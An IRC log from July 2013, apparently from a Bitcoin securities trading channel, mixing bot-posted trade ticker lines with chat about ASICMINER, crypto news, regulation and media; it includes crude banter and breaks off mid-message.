07:40:35 [HAVELOCK] [ASICM] 75 @ 0.0445 = 3.3375 BTC [+] Jul 09 07:43:22 [BTCTC] [AMC-PT] 499 @ 0.00233 = 1.1627 BTC [+] Jul 09 07:44:02 [BTCTC] [AMC-PT] 1141 @ 0.00233 = 2.6585 BTC [+] Jul 09 07:49:25 [BTCTC] [BASIC-MINING] 1 @ 0.289998 BTC [-] Jul 09 07:49:26 [BTCTC] [BASIC-MINING] 44 @ 0.289999 = 12.76 BTC [+] Jul 09 07:49:39 [HAVELOCK] [VTX] 3 @ 0.94 = 2.82 BTC [-] Jul 09 07:49:40 [HAVELOCK] [VTX] 1 @ 0.949 BTC [+] Jul 09 07:49:41 [HAVELOCK] [VTX] 17 @ 0.95 = 16.15 BTC [+] Jul 09 07:50:27 [BTCTC] [BASIC-MINING] 20 @ 0.289999 = 5.8 BTC [+] Jul 09 07:50:35 [HAVELOCK] [VTX] 8 @ 0.959 = 7.672 BTC [+] Jul 09 07:50:36 [HAVELOCK] [VTX] 10 @ 0.96 = 9.6 BTC [+] Jul 09 07:50:38 [HAVELOCK] [VTX] 9 @ 0.97 = 8.73 BTC [+] Jul 09 07:51:34 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [+] Jul 09 07:51:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [+] Jul 09 08:00:29 [BTCTC] [AMC-PT] 1 @ 0.002339 BTC [+] Jul 09 08:14:29 [BTCTC] [ASICMINER-PT] 1 @ 4.469999 BTC [-] Jul 09 08:14:32 [BTCTC] [ASICMINER-PT] 1 @ 4.47 BTC [+] Jul 09 08:16:19 [BTCTC] [AMC-PT] 125 @ 0.00234 = 0.2925 BTC [+] Jul 09 08:16:39 [BTCTC] [AMC-PT] 50 @ 0.00235 = 0.1175 BTC [+] Jul 09 08:17:20 [BTCTC] [AMC-PT] 50 @ 0.0024 = 0.12 BTC [+] Jul 09 08:18:50 [HAVELOCK] [ASICM] 9 @ 0.043503 = 0.3915 BTC [-] Jul 09 08:22:02 [BTCTC] [S.BBET-PT] 1 @ 0.001303 BTC [-] Jul 09 08:23:15 [BTCTC] [BITVPS] 50 @ 0.001903 = 0.0952 BTC [-] Jul 09 08:24:57 [BTCTC] [BITVPS] 100 @ 0.001903 = 0.1903 BTC [-] Jul 09 08:25:27 [BTCTC] [ASICMINER-PT] 10 @ 4.47 = 44.7 BTC [+] Jul 09 08:32:36 [BTCTC] [BITVPS] 3 @ 0.001902 = 0.0057 BTC [-] Jul 09 08:34:26 [BTCTC] [MININGCO.ETF] 1 @ 1.299999 BTC [+] Jul 09 08:34:28 [BTCTC] [MININGCO.ETF] 1 @ 1.3 BTC [+] Jul 09 08:35:21 [BTCTC] [DMS.SELLING] 20 @ 0.030996 = 0.6199 BTC [+] Jul 09 08:35:28 [BTCTC] [DMS.SELLING] 98 @ 0.030997 = 3.0377 BTC [+] Jul 09 08:36:00 [BTCTC] [AMC-PT] 83 @ 0.0024 = 0.1992 BTC [+] Jul 09 08:41:08 [BTCTC] [BITVPS] 100 @ 0.001901 = 0.1901 BTC [-] Jul 09 08:43:23 [BTCTC] [AMC-PT] 200 @ 0.0024 = 0.48 BTC [+] Jul 09 08:44:25 [BTCTC] [BASIC-MINING] 7 @ 0.289999 = 2.03 BTC [+] Jul 09 08:44:49 [BTCTC] [S.DICE-PT] 16 @ 0.002392 = 0.0383 BTC [-] Jul 09 08:47:51 [HAVELOCK] [HIM] 3 @ 0.3 = 0.9 BTC [+] Jul 09 08:53:53 [BTCTC] [AMC-PT] 400 @ 0.0024 = 0.96 BTC [+] Jul 09 08:54:48 [HAVELOCK] [ASICM] 14 @ 0.04444444 = 0.6222 BTC [+] Jul 09 08:55:16 [BTCTC] [ASICMINER-PT] 1 @ 4.479999 BTC [+] Jul 09 08:58:06 [BTCTC] [BITVPS] 55 @ 0.0019 = 0.1045 BTC [-] Jul 09 09:00:12 [MPEX] [S.MPOE] 8400 @ 0.00079355 = 6.6658 BTC [+] Jul 09 09:00:17 [MPEX] [S.MPOE] 11200 @ 0.00079372 = 8.8897 BTC [+] Jul 09 09:05:40 [BTCTC] [AMC-PT] 10 @ 0.0024 = 0.024 BTC [+] Jul 09 09:08:40 [HAVELOCK] [ASICM] 2 @ 0.04444444 = 0.0889 BTC [+] Jul 09 09:13:41 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [-] Jul 09 09:14:29 [BTCTC] [AMC-PT] 300 @ 0.0024 = 0.72 BTC [+] Jul 09 09:14:32 [BTCTC] [ASICMINER-PT] 1 @ 4.479999 BTC [+] **** BEGIN LOGGING AT Tue Jul 9 17:18:00 2013 Jul 09 17:19:44 [HAVELOCK] [ASICM] 1 @ 0.042512 BTC [+] Jul 09 17:21:48 [BTCTC] [AMC-PT] 5 @ 0.00241 = 0.0121 BTC [+] Jul 09 17:22:12 [BTCTC] [DMS.MINING] 5 @ 0.01949 = 0.0975 BTC [-] Jul 09 17:22:54 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [+] Jul 09 17:22:56 [BTCTC] [ASICMINER-PT] 1 @ 4.0001 BTC [-] Jul 09 17:23:07 [BTCTC] [ASICMINER-PT] 5 @ 4 = 20 BTC [-] Jul 09 17:24:02 [BTCTC] [ASICMINER-PT] 3 @ 4 = 12 BTC [-] Jul 09 17:24:09 [HAVELOCK] [ASICM] 10 @ 0.04251 = 0.4251 BTC [-] Jul 09 17:24:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.0417 = 0.1251 BTC [-] Jul 09 17:24:41 [BTCTC] [TAT.ASICMINER] 20 @ 0.0416 = 0.832 BTC [-] Jul 09 17:24:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.0415 = 0.083 BTC [-] Jul 09 17:24:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.041206 = 0.2884 BTC [-] Jul 09 17:24:47 [BTCTC] [TAT.ASICMINER] 22 @ 0.041205 = 0.9065 BTC [-] Jul 09 17:24:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.041201 = 0.618 BTC [-] Jul 09 17:24:51 [BTCTC] [TAT.ASICMINER] 31 @ 0.0412 = 1.2772 BTC [-] Jul 09 17:25:46 [BTCTC] [TAT.ASICMINER] 11 @ 0.0412 = 0.4532 BTC [-] Jul 09 17:25:55 [BTCTC] [TAT.ASICMINER] 7 @ 0.042999 = 0.301 BTC [+] Jul 09 17:26:23 [BTCTC] [TAT.ASICMINER] 8 @ 0.0412 = 0.3296 BTC [-] Jul 09 17:26:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.041111 = 0.4111 BTC [-] Jul 09 17:26:27 [BTCTC] [TAT.ASICMINER] 40 @ 0.0411 = 1.644 BTC [-] Jul 09 17:26:29 [BTCTC] [ASICMINER-PT] 5 @ 3.97 = 19.85 BTC [-] Jul 09 17:26:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.041011 = 0.3281 BTC [-] Jul 09 17:26:32 [BTCTC] [ASICMINER-PT] 1 @ 3.96 BTC [-] Jul 09 17:26:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.04101 = 0.2051 BTC [-] Jul 09 17:26:35 [BTCTC] [ASICMINER-PT] 2 @ 3.959999 = 7.92 BTC [-] Jul 09 17:26:37 [BTCTC] [ASICMINER-PT] 1 @ 3.95 BTC [-] Jul 09 17:26:37 [BTCTC] [TAT.ASICMINER] 29 @ 0.041001 = 1.189 BTC [-] Jul 09 17:26:39 [BTCTC] [ASICMINER-PT] 1 @ 3.92 BTC [-] Jul 09 17:26:40 [BTCTC] [ASICMINER-PT] 1 @ 3.91 BTC [-] Jul 09 17:26:42 [BTCTC] [ASICMINER-PT] 2 @ 3.900001 = 7.8 BTC [-] Jul 09 17:26:43 [BTCTC] [ASICMINER-PT] 50 @ 3.9 = 195 BTC [-] Jul 09 17:26:46 [BTCTC] [ASICMINER-PT] 1 @ 3.87 BTC [-] Jul 09 17:26:48 [BTCTC] [ASICMINER-PT] 1 @ 3.851001 BTC [-] Jul 09 17:26:50 [BTCTC] [ASICMINER-PT] 1 @ 3.85 BTC [-] Jul 09 17:26:52 [BTCTC] [ASICMINER-PT] 10 @ 3.82 = 38.2 BTC [-] Jul 09 17:26:54 [BTCTC] [ASICMINER-PT] 6 @ 3.8121 = 22.8726 BTC [-] Jul 09 17:26:54 [BTCTC] [ASICMINER-PT] 1 @ 3.812 BTC [-] Jul 09 17:26:56 [BTCTC] [ASICMINER-PT] 7 @ 3.811 = 26.677 BTC [-] Jul 09 17:26:58 [BTCTC] [ASICMINER-PT] 1 @ 3.81 BTC [-] Jul 09 17:27:00 [BTCTC] [ASICMINER-PT] 10 @ 3.81 = 38.1 BTC [-] Jul 09 17:27:04 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Jul 09 17:27:06 [BTCTC] [ASICMINER-PT] 5 @ 3.8 = 19 BTC [-] Jul 09 17:27:09 [BTCTC] [ASICMINER-PT] 2 @ 3.797777 = 7.5956 BTC [-] Jul 09 17:27:11 [BTCTC] [ASICMINER-PT] 20 @ 3.797776 = 75.9555 BTC [-] Jul 09 17:27:13 [BTCTC] [ASICMINER-PT] 1 @ 3.79 BTC [-] Jul 09 17:27:19 [BTCTC] [COGNITIVE] 1 @ 0.26 BTC [-] Jul 09 17:27:21 [BTCTC] [TAT.ASICMINER] 19 @ 0.041001 = 0.779 BTC [-] Jul 09 17:27:21 [BTCTC] [ASICMINER-PT] 10 @ 3.781 = 37.81 BTC [-] Jul 09 17:27:23 [BTCTC] [TAT.ASICMINER] 25 @ 0.041 = 1.025 BTC [-] Jul 09 17:27:25 [BTCTC] [TAT.ASICMINER] 25 @ 0.041 = 1.025 BTC [-] Jul 09 17:27:27 [BTCTC] [TAT.ASICMINER] 30 @ 0.041 = 1.23 BTC [-] Jul 09 17:27:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.041 = 2.05 BTC [-] Jul 09 17:27:30 [BTCTC] [ASICMINER-PT] 2 @ 3.77 = 7.54 BTC [-] Jul 09 17:27:31 [BTCTC] [TAT.ASICMINER] 18 @ 0.041 = 0.738 BTC [-] Jul 09 17:27:34 [BTCTC] [ASICMINER-PT] 3 @ 3.77 = 11.31 BTC [-] Jul 09 17:27:36 [BTCTC] [ASICMINER-PT] 50 @ 3.760001 = 188.0001 BTC [-] Jul 09 17:27:38 [BTCTC] [ASICMINER-PT] 5 @ 3.76 = 18.8 BTC [-] Jul 09 17:27:50 [HAVELOCK] [ASICM] 4 @ 0.04251 = 0.17 BTC [-] Jul 09 17:28:05 http://images5.fanpop.com/image/photos/31000000/So-I-heard-you-liek-Hussie-mintymidget210-and-wednesday-31090988-374-451.png Jul 09 17:28:11 [HAVELOCK] [ASICM] 1 @ 0.041112 BTC [-] Jul 09 17:28:12 [HAVELOCK] [ASICM] 2 @ 0.041112 = 0.0822 BTC [-] Jul 09 17:28:14 [HAVELOCK] [ASICM] 1 @ 0.041111 BTC [-] Jul 09 17:28:15 [HAVELOCK] [ASICM] 130 @ 0.0411 = 5.343 BTC [-] Jul 09 17:28:16 [HAVELOCK] [ASICM] 4 @ 0.041 = 0.164 BTC [-] Jul 09 17:28:17 [HAVELOCK] [ASICM] 5 @ 0.04080102 = 0.204 BTC [-] Jul 09 17:28:18 [HAVELOCK] [ASICM] 20 @ 0.040801 = 0.816 BTC [-] Jul 09 17:28:19 [HAVELOCK] [ASICM] 50 @ 0.0408 = 2.04 BTC [-] Jul 09 17:28:21 [HAVELOCK] [ASICM] 20 @ 0.040601 = 0.812 BTC [-] Jul 09 17:28:22 [HAVELOCK] [ASICM] 20 @ 0.040501 = 0.81 BTC [-] Jul 09 17:28:22 [HAVELOCK] [ASICM] 47 @ 0.0405 = 1.9035 BTC [-] Jul 09 17:28:55 [HAVELOCK] [ASICM] 89 @ 0.041113 = 3.6591 BTC [+] Jul 09 17:29:37 [HAVELOCK] [ASICM] 1 @ 0.043998 BTC [+] Jul 09 17:30:33 [BTCTC] [TAT.ASICMINER] 20 @ 0.041001 = 0.82 BTC [+] Jul 09 17:31:40 [BTCTC] [TAT.ASICMINER] 22 @ 0.041001 = 0.902 BTC [+] Jul 09 17:38:52 hi, tat here? Jul 09 17:38:59 Yes Jul 09 17:39:44 [BTCTC] [ASICMINER-PT] 10 @ 3.9 = 39 BTC [+] Jul 09 17:40:11 gratulations on the board seat. as far as i remember you said something like "if i get a seat, i'll try to share try much information", is that still your plan? and will you receive hardware now? Jul 09 17:41:02 I never said anything about sharing information Jul 09 17:41:07 that is actually not allowed Jul 09 17:41:16 I will share any info I am told I can share Jul 09 17:41:31 and any answers to the Official Poll Questions that Friedcat answers Jul 09 17:41:54 What is Friedcat's favorite color Jul 09 17:42:04 it's a secret! Jul 09 17:42:10 dammit i want answers Jul 09 17:42:13 ASICMINER has not given any hardware to boardmembers yet Jul 09 17:42:14 oh Jul 09 17:42:26 if they do it will be shared with the PTs Jul 09 17:42:33 well i guess it was burnside then, but i understand still Jul 09 17:42:41 Burnside can't share info either Jul 09 17:42:53 yea.. Jul 09 17:43:13 what about the hardware for board members? do i recall this correctly? Jul 09 17:44:10 [BTCTC] [ASICMINER-PT] 1 @ 3.99 BTC [+] Jul 09 17:44:25 [BTCTC] [AMC-PT] 3 @ 0.0023 = 0.0069 BTC [-] Jul 09 17:44:27 [BTCTC] [AMC-PT] 6 @ 0.0023 = 0.0138 BTC [-] Jul 09 17:44:44 [BTCTC] [AMC-PT] 137 @ 0.002214 = 0.3033 BTC [-] Jul 09 17:44:46 [BTCTC] [AMC-PT] 250 @ 0.002214 = 0.5535 BTC [-] Jul 09 17:45:13 [BTCTC] [AMC-PT] 250 @ 0.002213 = 0.5533 BTC [-] Jul 09 17:45:15 [BTCTC] [AMC-PT] 100 @ 0.002213 = 0.2213 BTC [-] Jul 09 17:45:38 [HAVELOCK] [ASICM] 1 @ 0.040701 BTC [-] Jul 09 17:45:39 [HAVELOCK] [ASICM] 1 @ 0.0407 BTC [-] Jul 09 17:45:41 [HAVELOCK] [ASICM] 100 @ 0.0406 = 4.06 BTC [-] Jul 09 17:45:42 [HAVELOCK] [ASICM] 3 @ 0.0405 = 0.1215 BTC [-] Jul 09 17:45:43 [HAVELOCK] [ASICM] 119 @ 0.0405 = 4.8195 BTC [-] Jul 09 17:45:44 [HAVELOCK] [ASICM] 2 @ 0.04000001 = 0.08 BTC [-] Jul 09 17:45:44 [HAVELOCK] [ASICM] 4 @ 0.04 = 0.16 BTC [-] Jul 09 17:45:45 [HAVELOCK] [ASICM] 9 @ 0.04 = 0.36 BTC [-] Jul 09 17:45:47 [HAVELOCK] [ASICM] 2 @ 0.04 = 0.08 BTC [-] Jul 09 17:45:48 [HAVELOCK] [ASICM] 59 @ 0.04 = 2.36 BTC [-] Jul 09 17:45:50 [HAVELOCK] [ASICM] 19 @ 0.04 = 0.76 BTC [-] Jul 09 17:45:51 [HAVELOCK] [ASICM] 50 @ 0.04 = 2 BTC [-] Jul 09 17:45:53 [HAVELOCK] [ASICM] 31 @ 0.04 = 1.24 BTC [-] Jul 09 17:45:59 [BTCTC] [DMS.MINING] 2 @ 0.01949 = 0.039 BTC [-] Jul 09 17:46:10 [BTCTC] [TAT.ASICMINER] 49 @ 0.040501 = 1.9845 BTC [-] Jul 09 17:46:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.0405 = 0.1215 BTC [-] Jul 09 17:46:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.0405 = 0.2025 BTC [-] Jul 09 17:47:58 [BTCTC] [S.MPOE-PT] 5 @ 0.000897 = 0.0045 BTC [+] Jul 09 17:48:43 [BTCTC] [ASICMINER-PT] 21 @ 3.99 = 83.79 BTC [+] Jul 09 17:50:40 [BTCTC] [S.MPOE-PT] 4 @ 0.000897 = 0.0036 BTC [+] Jul 09 17:51:47 [BTCTC] [ASICMINER-PT] 3 @ 3.99 = 11.97 BTC [+] Jul 09 17:53:13 My ecig is probably one of my best investments, never have to leave my desk now. Jul 09 17:53:45 [BTCTC] [TAT.ASICMINER] 65 @ 0.040225 = 2.6146 BTC [-] Jul 09 17:54:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.0425 = 0.085 BTC [+] Jul 09 17:54:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.040225 = 0.1207 BTC [-] Jul 09 17:55:15 [BTCTC] [AMC-PT] 2 @ 0.0024 = 0.0048 BTC [+] Jul 09 17:55:16 [BTCTC] [ASICMINER-PT] 13 @ 3.99 = 51.87 BTC [+] Jul 09 17:55:59 [BTCTC] [ASICMINER-PT] 1 @ 3.99 BTC [+] Jul 09 17:59:23 [BTCTC] [DMS.MINING] 27 @ 0.01949 = 0.5262 BTC [-] Jul 09 18:00:15 heh, that selloff mightve actually been price manipulation, they didn't like it when i started buying their wall Jul 09 18:01:02 I was going to try to work it, but bought back too high Jul 09 18:01:53 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.004699 = 0.0423 BTC [-] Jul 09 18:06:25 [BTCTC] [DMS.MINING] 14 @ 0.01949 = 0.2729 BTC [-] Jul 09 18:08:39 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004699 = 0.0141 BTC [-] Jul 09 18:20:11 [BTCTC] [TAT.ASICMINER] 20 @ 0.0405 = 0.81 BTC [+] Jul 09 18:21:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.041989 BTC [+] Jul 09 18:23:14 [BTCTC] [DMS.SELLING] 20 @ 0.029601 = 0.592 BTC [-] Jul 09 18:23:23 [BTCTC] [DMS.SELLING] 1 @ 0.029601 BTC [-] Jul 09 18:23:25 [BTCTC] [DMS.SELLING] 29 @ 0.0296 = 0.8584 BTC [-] Jul 09 18:24:00 [BTCTC] [DMS.PURCHASE] 49 @ 0.048997 = 2.4009 BTC [+] Jul 09 18:24:18 ;;later tell davout lol at eskimo reinventing teh wheel https://bitcointalk.org/index.php?topic=251051.msg2673044#msg2673044 Jul 09 18:24:20 The operation succeeded. Jul 09 18:28:35 ;;bcstats Jul 09 18:28:37 Current Blocks: 245695 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 256 blocks | Next Difficulty In About: 1 day, 7 hours, 30 minutes, and 27 seconds | Next Difficulty Estimate: 25967616.5079 | Estimated Percent Change: 21.71182 Jul 09 18:29:48 sh Jul 09 18:30:06 oops. Jul 09 18:30:13 [BTCTC] [BASIC-MINING] 3 @ 0.28 = 0.84 BTC [-] Jul 09 18:39:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.041979 = 0.2099 BTC [-] Jul 09 18:42:18 [BTCTC] [DMS.MINING] 4 @ 0.019 = 0.076 BTC [-] Jul 09 18:42:57 [BTCTC] [DMS.MINING] 11 @ 0.019 = 0.209 BTC [-] Jul 09 18:42:59 [BTCTC] [DMS.MINING] 25 @ 0.01865 = 0.4663 BTC [-] Jul 09 18:52:55 [BTCTC] [TAT.ASICMINER] 11 @ 0.041979 = 0.4618 BTC [-] Jul 09 18:55:45 [HAVELOCK] [ASICM] 4 @ 0.041789 = 0.1672 BTC [+] Jul 09 18:55:57 [BTCTC] [S.MPOE-PT] 5 @ 0.000897 = 0.0045 BTC [+] Jul 09 18:56:41 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004699 BTC [-] Jul 09 19:03:19 [BTCTC] [TAT.ASICMINER] 23 @ 0.04195 = 0.9649 BTC [-] Jul 09 19:03:31 this just-dice site is too much fun Jul 09 19:04:20 wow. site is up 1745? I think 300 was the most I've seen. Jul 09 19:04:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004699 BTC [-] Jul 09 19:05:36 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.004699 = 0.0282 BTC [-] Jul 09 19:05:39 [BTCTC] [DMS.MINING] 1 @ 0.0194 BTC [+] Jul 09 19:10:05 It's too much fun Jul 09 19:10:22 I better get off it while I still have a profit lol Jul 09 19:11:42 [BTCTC] [TAT.ASICMINER] 20 @ 0.041949 = 0.839 BTC [-] Jul 09 19:12:04 http://forexmagnates.com/bitcoins-soar-in-value-in-argentina-due-to-capital-control-laws-bitcoin-meetup-held-in-nations-capital/ Jul 09 19:12:07 Bitcoins Soar In Value In Argentina Due To Capital Control Laws, Bitcoin MeetUp Held In Nation's Cap Jul 09 19:12:45 [HAVELOCK] [ASICM] 7 @ 0.041789 = 0.2925 BTC [+] Jul 09 19:13:06 [BTCTC] [ASICMINER-PT] 1 @ 4.189999 BTC [+] Jul 09 19:13:08 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [+] Jul 09 19:13:10 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [+] Jul 09 19:13:24 http://www.wired.com/wiredenterprise/2013/07/esea-2/ Jul 09 19:13:25 Rogue Employee Fired for Turning Game Network Into Bitcoin Mining Colony | Wired Enterprise | Wired. Jul 09 19:13:39 [BTCTC] [ASICMINER-PT] 4 @ 4.2 = 16.8 BTC [+] Jul 09 19:14:29 http://mashable.com/2013/07/08/bitcoin-alternatives/ Jul 09 19:14:30 5 Top Bitcoin Alternatives Jul 09 19:14:47 Yeah should of listened to logic Jul 09 19:16:44 http://www.cnbc.com/id/100868874 Jul 09 19:16:44 ;;google Dr. Dre Jul 09 19:16:45 Dr. Dre: Home: ; Dr. Dre - Wikipedia, the free encyclopedia: ; Beats by Dre: Jul 09 19:16:47 Bitcoin ATM Gets Ready for Roll Out Jul 09 19:18:20 http://www.indexuniverse.com/sections/features/19194-making-cents-of-the-bitcoin-etf.html Jul 09 19:18:25 Making Cents Of The Bitcoin ETF Jul 09 19:18:28 "Ultimately, the question I’ve been asking anyone who will listen is, What is a bitcoin supposed to be, a currency or a store of wealth?" Jul 09 19:18:51 "If it’s intended to be a currency, then I have little doubt the Treasury Department will eventually shut it down." Jul 09 19:19:16 "...the Treasury has made it clear that it does have jurisdiction over domestic bitcoin “miners” and exchanges." Jul 09 19:20:38 the "Treasury" can suck my fat dick Jul 09 19:20:52 oh Jul 09 19:20:55 stop quoting stuff Jul 09 19:21:31 [BTCTC] [TAT.ASICMINER] 25 @ 0.04195 = 1.0488 BTC [+] Jul 09 19:21:50 the Treasury is in the business of anal penetration, not oral relief Jul 09 19:22:02 i mean Jul 09 19:22:08 "the Treasury is in the business of anal penetration, not oral relief" Jul 09 19:22:11 ;) Jul 09 19:22:23 [BTCTC] [BASIC-MINING] 1 @ 0.28 BTC [-] Jul 09 19:22:25 [BTCTC] [BASIC-MINING] 97 @ 0.288 = 27.936 BTC [+] Jul 09 19:22:25 [BTCTC] [BASIC-MINING] 2 @ 0.289 = 0.578 BTC [+] Jul 09 19:23:11 final line of the article: "As always, time will tell. In the meantime, I hope someone can explain to me what a bitcoin is." Jul 09 19:23:25 first comment: Jul 09 19:23:30 "Bitcoin is a bad idea. Creating an ETF for bitcoin compounds idiocy on top of baloney. This is a disaster. The federal government is already shuting down bitcoin exchanges as unlicensed money transfer operations." Jul 09 19:23:52 replace captchas with IQ tests Jul 09 19:23:58 problem solved Jul 09 19:26:51 https://twitter.com/BBCBreaking/status/354613199166906368 Jul 09 19:26:53 Twitter / BBCBreaking: Tweet saying Edward Snowden ... Jul 09 19:27:06 "Tweet saying Edward Snowden accepts Venezuela asylum offer no longer on timeline of Russian politician @Alexey_Pushkov - situation unclear" Jul 09 19:27:53 related: http://www.theverge.com/2013/7/9/4507094/fbi-director-nominee-comey-testifies-whistleblowers Jul 09 19:28:30 TAT is the best news aggregator bot Jul 09 19:28:46 Today's Daily NewsLinks brought to you by the letters, T,A,T Jul 09 19:28:53 one final WTF link for you Jul 09 19:28:56 http://www.theverge.com/2013/7/9/4506836/nypd-study-chemical-attack-on-new-york-city-subway Jul 09 19:28:59 Researchers gas New York City Subway to prepare for terror attacks | The Verge Jul 09 19:30:16 lol so guy shoots gf while aiming for exgf Jul 09 19:30:40 "...the Treasury has made it clear that it does have jurisdiction over domestic bitcoin “miners” and exchanges." <<< where ? Jul 09 19:30:42 [BTCTC] [ASICMINER-PT] 1 @ 4.180001 BTC [-] Jul 09 19:30:45 [BTCTC] [ASICMINER-PT] 1 @ 4.16 BTC [-] Jul 09 19:30:54 [BTCTC] [ASICMINER-PT] 5 @ 4.1 = 20.5 BTC [-] Jul 09 19:31:02 im getting sick of various folks flooding the market with their inept and unrequested "interpretations" of stuff Jul 09 19:32:18 i suppose in a broad sense, it's a fair assumption that the US Gov thinks it has jurisdiction over everything it wishes to Jul 09 19:33:23 but that's not what random author schmuck said,. Jul 09 19:33:38 [BTCTC] [DMS.SELLING] 10 @ 0.03098 = 0.3098 BTC [+] Jul 09 19:33:51 im siock of it, the "bitcoin foundation" idiots came out with a completely orthogonal read ofg the fincen thing Jul 09 19:34:05 it's the new hip thing, people without a fucking clue as to reading telling you what X said. Jul 09 19:34:29 then they reddit each other into a froth and before we know it "it's widely accepted that the moon is hotter than earth and bison died of alien anal probing" Jul 09 19:35:04 the sort of behavior that forms religions Jul 09 19:35:17 hmm Jul 09 19:35:29 myeah. Jul 09 19:35:32 i wonder if Americanism could be classified Jul 09 19:35:47 [BTCTC] [TAT.ASICMINER] 14 @ 0.041949 = 0.5873 BTC [-] Jul 09 19:36:00 [BTCTC] [ASICMINER-PT] 1 @ 4.199996 BTC [+] Jul 09 19:36:06 yes it could. "entitled illiterate opinionated herd". Jul 09 19:36:46 their temples are mcdonald's Jul 09 19:37:06 [BTCTC] [DMS.MINING] 5 @ 0.0194 = 0.097 BTC [+] Jul 09 19:37:08 nah, those used to be the temples. the new temples are stuff like reddit and huffpo Jul 09 19:37:09 and comment sections Jul 09 19:37:14 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004699 = 0.0094 BTC [-] Jul 09 19:37:45 [BTCTC] [DMS.MINING] 1 @ 0.01865 BTC [-] Jul 09 19:37:47 [BTCTC] [DMS.MINING] 13 @ 0.01865 = 0.2425 BTC [-] Jul 09 19:37:48 [BTCTC] [DMS.MINING] 32 @ 0.01865 = 0.5968 BTC [-] Jul 09 19:37:50 look at mircea_popescu hating on huffington post Jul 09 19:37:50 [BTCTC] [DMS.MINING] 20 @ 0.01865 = 0.373 BTC [-] Jul 09 19:37:58 [BTCTC] [DMS.MINING] 1 @ 0.018303 BTC [-] Jul 09 19:37:58 huffington post is the best news site ever Jul 09 19:37:59 [BTCTC] [DMS.MINING] 38 @ 0.018302 = 0.6955 BTC [-] Jul 09 19:38:14 [BTCTC] [ASICMINER-PT] 3 @ 4.199996 = 12.6 BTC [+] Jul 09 19:38:15 most news companies are laughable Jul 09 19:38:24 at least in the US Jul 09 19:38:41 or we can just accept news is written for us and the only way to truly know truth is to find it yourself Jul 09 19:38:44 go to CNN.com and have a look at the home page content Jul 09 19:38:50 it's embarassing Jul 09 19:38:51 it's bad elsewhere too Jul 09 19:39:05 I just suppose it's fake by default Jul 09 19:39:08 [BTCTC] [DMS.PURCHASE] 56 @ 0.048913 = 2.7391 BTC [-] Jul 09 19:39:10 [BTCTC] [TAT.ASICMINER] 12 @ 0.041949 = 0.5034 BTC [-] Jul 09 19:39:15 oh btw mircea_popescu Jul 09 19:39:15 s/suppose/assume/ Jul 09 19:39:17 http://i.imgur.com/sdDLz1p.jpg Jul 09 19:39:20 is going to sell millions Jul 09 19:39:40 MORE TOP STORIES Jul 09 19:39:40 Floods trap Toronto train riders | Photos Jul 09 19:39:40 Gas pump wreck sets man on fire Jul 09 19:39:40 So, where's our 4-day workweek? Jul 09 19:39:40 Chantal may strengthen | Tracker Jul 09 19:39:41 Expert: Bad hurricanes coming Time Jul 09 19:39:41 Pats owner felt 'duped' by Hernandez Jul 09 19:39:42 Road to political redemption shorter? Jul 09 19:39:45 from CNN Jul 09 19:40:21 See her casually hire hit man for husband Jul 09 19:40:35 He wore cowboy hat, tended vegetables (Bib Laden) Jul 09 19:40:38 bin* Jul 09 19:40:48 Sharks, hot babes, undies signal this ... Jul 09 19:40:53 I just suppose it's fake by default << pretty much everone sane does by now. Jul 09 19:40:54 ok i'll stop Jul 09 19:41:21 thestringpuller you know, one of the best games ever made, ie elite, sold ~100k copies ? Jul 09 19:41:29 i still remember it, 20 years later. Jul 09 19:42:16 "lawmakers voted to ban Internet cafes that facilitated online gambling in the state. But in doing so, they might have accidentally also banned all computers and smartphones" Jul 09 19:42:23 apparently it's not just internet-lawyers. Jul 09 19:42:38 oops Jul 09 19:43:02 they also got rid of many Veterans favorite place to chill Jul 09 19:43:12 fwiw Jul 09 19:43:18 [BTCTC] [ASICMINER-PT] 1 @ 4.199997 BTC [+] Jul 09 19:43:50 Shadow Warrior Jul 09 19:44:04 [12:42:16] "lawmakers voted to ban Internet cafes that facilitated online gambling in the state. But in doing so, they might have accidentally also banned all computers and smartphones" Jul 09 19:44:09 [HAVELOCK] [ASICM] 25 @ 0.042888 = 1.0722 BTC [+] Jul 09 19:44:12 I lol'd Jul 09 19:46:26 uh my point is Roomba Simulator 2013 will be a hit! Jul 09 19:46:38 It'll go triple platinum Jul 09 19:47:10 Do you fight evil dirt balls? Jul 09 19:47:15 nope Jul 09 19:47:18 it's a simulator! Jul 09 19:47:21 You pick up dirt Jul 09 19:47:31 evil dirt balls Jul 09 19:47:34 pffft Jul 09 19:47:41 You telling my little roomba doesn't actually battle the dirt in my house but just, collects it? Jul 09 19:47:47 YUP Jul 09 19:47:56 Lazy son of a bitch Jul 09 19:48:27 mircea_popescu: what are you like 50? Jul 09 19:48:40 mircea_popescu: the is unless you were playing Elite when you were a teen Jul 09 19:49:00 that* Jul 09 19:49:45 Does anyone use Bitmessage that often? Jul 09 19:50:33 i was preteen Jul 09 19:51:56 AWW little Popescu Jul 09 19:51:57 so cute Jul 09 19:52:27 mhm Jul 09 19:52:53 I bet you had lost your virigity by then for a whole decade Jul 